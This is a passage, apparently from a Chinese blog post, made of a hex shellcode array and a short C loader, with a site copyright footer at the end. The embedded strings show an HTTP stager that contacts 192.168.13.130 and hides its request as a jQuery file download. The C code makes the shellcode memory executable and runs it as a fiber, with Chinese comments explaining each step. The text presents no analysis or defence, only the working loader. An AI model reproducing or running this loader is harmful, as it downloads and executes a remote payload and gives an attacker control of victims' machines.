x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x50\x00\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x6a\x71\x75\x65\x72\x79\x2d\x33\x2e\x33\x2e\x32\x2e\x73\x6c\x69\x6d\x2e\x6d\x69\x6e\x2e\x6a\x73\x00\x17\x83\x47\x19\x26\xd4\x3b\x55\x5a\x7f\x2f\x8a\x88\xf6\xb1\x6c\x22\x27\xf8\xf9\x0c\x22\x1f\x59\xae\x17\x6b\xcb\xca\xf8\x66\x6f\xdd\xbb\xeb\x98\x68\xa1\xc7\x35\x29\x88\xd6\xee\xa5\xb9\x5b\x80\x7f\xec\xf4\x1b\xd7\x00\x41\x63\x63\x65\x70\x74\x3a\x20\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x68\x74\x6d\x6c\x2b\x78\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x6d\x6c\x3b\x71\x3d\x30\x2e\x39\x2c\x2a\x2f\x2a\x3b\x71\x3d\x30\x2e\x38\x0d\x0a\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x3a\x20\x65\x6e\x2d\x55\x53\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x35\x0d\x0a\x52\x65\x66\x65\x72\x65\x72\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x63\x6f\x64\x65\x2e\x6a\x71\x75\x65\x72\x79\x2e\x63\x6f\x6d\x2f\x0d\x0a\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x0d\x0a\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x33\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x37\x2e\x30\x3b\x20\x72\x76\x3a\x31\x31\x2e\x30\x29\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x0d\x0a\x00\xd0\xdb\x73\xdc\x21\x32\x0b\x41\x4e\x68\x98\xc1\xdf\x00\xeb\x83\xa4\x7d\x01\x3e\x15\xe3\x61\x1d\xd1\x02\xa6\x2c\x38\xa7\x58\x70\x0d\x1c\x2a\x6d\x4a\x30\x41\x39\x28\x6a\x41\xeb\x44\xa7\x49\xbe\x52\x97\xe8\x11\x2f\x7f\xc0\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\xaf\x0f\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x33\x2e\x31\x33\x30\x00\x00\x01\x86\xa0";
void main() {// 修改shellcode所在内存的保护属性为可读、可写、可执行DWORD oldProtect;VirtualProtect((LPVOID)sc, sizeof(sc), PAGE_EXECUTE_READWRITE, &oldProtect);// 将当前线程转换为纤程(轻量级线程)ConvertThreadToFiber(NULL);// 创建一个纤程对象,关联到shellcode作为纤程入口点,使用默认栈大小和无标志位void* shellcodeFiber = CreateFiber(0, (LPFIBER_START_ROUTINE)(LPVOID)sc, NULL);// 切换到新创建的纤程,开始执行shellcodeSwitchToFiber(shellcodeFiber);// shellcode执行完毕后,删除纤程对象DeleteFiber(shellcodeFiber);
}

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com